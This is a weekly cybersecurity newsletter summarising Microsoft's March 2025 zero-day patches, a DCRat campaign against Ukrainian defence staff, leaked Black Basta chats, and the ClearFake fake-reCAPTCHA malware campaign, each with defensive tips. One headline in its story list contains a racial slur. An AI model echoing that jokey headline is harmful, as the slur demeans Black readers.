Mar 21 2025
Welcome to Gone Phishing, your weekly cybersecurity newsletter that’s popping like fresh 🍞🥖🥨🍰🧁
Patch of the Week! 🩹
First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳
Congrats to Windows, the cybercriminals are no match… for your patch! 🩹
Check out this freshly hatched patch 🐣
🛡️ Microsoft Patch Tuesday: 57 Bugs Fixed, 6 Zero-Days Under Attack! 💀
Microsoft just dropped 57 security patches, including 6 zero-days being actively exploited! ⚠️
Top risks include:
Win32 Kernel exploit (CVE-2025-24983) lets attackers gain SYSTEM privileges.
File system flaws allowing data theft & remote code execution.
Microsoft Management Console bypass (CVE-2025-26633) to evade security protections.
The U.S. CISA has added these to its Known Exploited Vulnerabilities (KEV) list, giving agencies until April 1, 2025 to patch. If you haven’t updated yet, do it NOW to stay protected! 🔒
Now, on to this week’s hottest cybersecurity news stories:
🐀 Dark Crystal targets Ukraine 🎯
👾 Basta crimes spreads Evel Knievel 🏍️
🔎 ClearFake it before you make it nigga ☠️
The Computer Emergency Response Team of Ukraine (CERT-UA) warns of a new cyber espionage campaign deploying Dark Crystal RAT (DCRat) against defense industry employees and military personnel.
🚨 How the Attack Works
🔹 Malicious messages sent via Signal 📲
🔹 Compromised accounts used to increase trust 🕵️♂️
🔹 Fake meeting minutes sent as archive files 📁
🔹 Contains a decoy PDF + DarkTortilla crypter 🎭
🔹 Decryption leads to full remote access via DCRat 💻
🕵️ Who’s Behind It?
CERT-UA attributes the attack to UAC-0200, active since mid-2024.
🔥 Why It’s Dangerous
✅ DCRat executes arbitrary commands 🛠️
✅ Steals sensitive data & credentials 🔑
✅ Grants attackers remote control over infected systems
🌍 Cyber Tensions & Signal Controversy
🔸 Reports claim Signal is no longer assisting Ukrainian authorities in countering Russian cyber threats
🔸 Signal denies these claims, stating it does not collaborate with any government
🔐 How to Stay Safe
✅ Be cautious of unexpected Signal messages 🚧
✅ Verify senders before opening attachments
✅ Use endpoint protection & monitor for unauthorized activity 🔍
Russian-linked cyber actors are increasingly targeting secure messaging platforms—stay vigilant and protect sensitive data! 🚨
Explore this ready-to-go guide to support your IT operations in 130+ countries. Discover how:
Standardizing global IT operations enhances efficiency and reduces overhead
Ensuring compliance with local IT legislation to safeguard your operations
Integrating Deel IT with EOR, global payroll, and contractor management optimizes your tech stack
Leverage Deel IT to manage your global operations with ease.
🕵️ Leaked Black Basta Chats Reveal Russian Ties & Cybercrime Expansion
A leak of 200,000 internal chat messages from the Black Basta ransomware gang suggests possible links to Russian authorities and major cybercrime operations.
🚨 Key Revelations
🔹 Leader Oleg Nefedov (GG/AA) allegedly escaped arrest in Armenia with Russian officials’ help
🔹 Two suspected offices in Moscow 🏢
🔹 Used ChatGPT for fraud, malware development, and debugging 🤖
🔹 Overlaps with other ransomware gangs (Rhysida, CACTUS) 🎭
🔹 Developed a custom C2 framework (“Breaker”) for persistence & stealth
🔥 Brute-Force Attacks with BRUTED
🔹 Custom tool “BRUTED” automates credential stuffing 🔑
🔹 Targets firewalls, VPNs, & edge network devices
🔹 Used since 2023 for large-scale password attacks
🕵️ What’s Next for Black Basta?
🔸 Possible rebrand with new ransomware based on Conti’s code
🔸 Heavy investment in automated cyberattacks
🔸 Scaling credential theft & network infiltration
🔐 How to Stay Protected
✅ Enforce strong, unique passwords & MFA 🔄
✅ Monitor for unusual login attempts & brute-force attacks 🔍
✅ Patch firewalls & VPNs to prevent exploitation 🔥
With growing automation & state-level connections, Black Basta remains a top ransomware threat—organizations must stay ahead! 🚧
🎭 ClearFake Uses Fake reCAPTCHA to Spread Malware
The ClearFake campaign is tricking users with fake reCAPTCHA and Cloudflare Turnstile verifications, leading them to download Lumma Stealer and Vidar Stealer malware. At least 9,300 websites have been compromised.
🔥 How the Attack Works
🔹 Users visit a hacked site—JavaScript loads from Binance Smart Chain (BSC) 📜
🔹 Victim is tricked into running malicious PowerShell (ClickFix technique)
🔹 Deploys Emmenhtal Loader (PEAKLIGHT) → Drops Lumma Stealer
🔹 New variant encrypts HTML & expands Web3 capabilities 🕵️♂️
⚠️ Why This Is Dangerous
✅ Uses blockchain (BSC) for resilience & stealth
✅ Compromised over 9,300 sites & exposed 200,000+ users
✅ Targets both Windows & macOS users
✅ Frequently updated to evade detection
🛡️ How to Stay Safe
✅ Never download "browser updates" from pop-ups 🚫
✅ Be cautious of CAPTCHA prompts on unfamiliar sites
✅ Monitor PowerShell execution & network traffic 🔍
✅ Keep browsers & security tools updated
With widespread infections & rapid evolution, ClearFake remains a major global threat—stay vigilant! 🚨
🗞️ Extra, Extra! Read all about it! 🗞️
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅
💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓
📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾
Let us know what you think.
So long and thanks for reading all the phish!
